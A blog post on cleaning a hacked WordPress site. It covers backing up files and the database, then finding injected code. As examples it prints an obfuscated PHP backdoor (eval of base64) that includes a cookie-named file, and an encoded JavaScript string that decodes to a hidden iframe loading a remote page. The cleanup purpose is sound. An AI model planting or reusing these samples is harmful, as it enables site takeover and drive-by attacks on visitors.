Get the full commented source code of

HTML5 Suika Watermelon Game

Talking about WordPress.

The last time my blog was hacked was… let me remember… uh… yesterday.

But hackers know my blog since quite a long ago and they even made my blog be marked by Google as a site that may harm your computer.

Never mind, all these attacks gave me some experience about the typical WordPress hack.

So, when you realize your blog has been hacked, follow these steps:

Backup your ftp content

Simply open your favorite FTP client and download all the content of your site

Backup your MySQL database

Every decent hosting plan now supports PhpMyAdmin. With this tool you can export and save your entire database in a matter of seconds (or minutes, according to the size of your DB).

Look at this picture:

with your WP database selected, click on Export (1)

Then this is the next page:

remember to:

1) Have all tables selected

2) Select SQL as database type

3) Check Structure, Add IF NOT EXISTS and Enclose table and field names with backquotes. Leave unchecked Add AUTO_INCREMENT value because WP tables already have an auto increment column

4) Check Data, Complete inserts, Extended inserts and Use hexadecimal for BLOB

5) Check Save as file and None. Choosing zipped can be too CPU intensive for your hosting plan

Hunt for the virus

I experienced two types of viruses, both with inserted code into my WP files.

The first one is Php code inserted in one page, like this one

eval(base64_decode('aWYoaXNzZXQoJF9DT09LSUVbInNoIl0pKXtpbmNsdWRlKCRfQ09PS0lFWyJzaCJdKTtleGl0O30='));

that once evaluated is

if(isset($_COOKIE["sh"])){include($_COOKIE["sh"]);exit;}

The second one is a javascript code inserted in one page, like this one

var OymMAWPnBMGWAGuoPiVY = "q60q105q102q114q97q109q101q32q119q105q100q116q104q61q34q52q56q48q34q32q104q101q105q103q104q116q61q34q54q48q34q32q115q114q99q61q34q104q116q116q112q58q47q47q105q108q111q118q101q104q97q115q104q46q99q110q47q114q97q115q116q97q116q100q115q47q103q111q46q112q104q112q63q115q105q100q61q53q34q32q115q116q121q108q101q61q34q98q111q114q100q101q114q58q48q112q120q59q32q112q111q115q105q116q105q111q110q58q114q101q108q97q116q105q118q101q59q32q116q111q112q58q48q112q120q59q32q108q101q102q116q58q45q53q48q48q112q120q59q32q111q112q97q99q105q116q121q58q48q59q32q102q105q108q116q101q114q58q112q114q111q103q105q100q58q68q88q73q109q97q103q101q84q114q97q110q115q102q111q114q109q46q77q105q99q114q111q115q111q102q116q46q65q108q112q104q97q40q111q112q97q99q105q116q121q61q48q41q59q32q45q109q111q122q45q111q112q97q99q105q116q121q58q48q34q62q60q47q105q102q114q97q109q101q62";var LtBVGDCUsUSHTFUTcjHd = OymMAWPnBMGWAGuoPiVY.split("q");var wOAwUuljcGInzJIGNLaG = "";for (var gtNzyhTaRbENpEKKzvub=1; gtNzyhTaRbENpEKKzvub

that once evaluated returns

I got some more similar codes injected in my pages, but all of them have been inserted at the end of the page, in the last row.

So you should search for eval or document.write and see if there are strange strings like the ones I got.

Then, delete or comment them and you should have your blog cleaned and virus-free

I am thinking about making a plugin doing all this hard work for you, at the moment the only one existing seems to be WordPress Exploit Scanner but I would like something more complete.

Never miss an update! Subscribe, and I will bother you by email only when a new game or full source code comes out.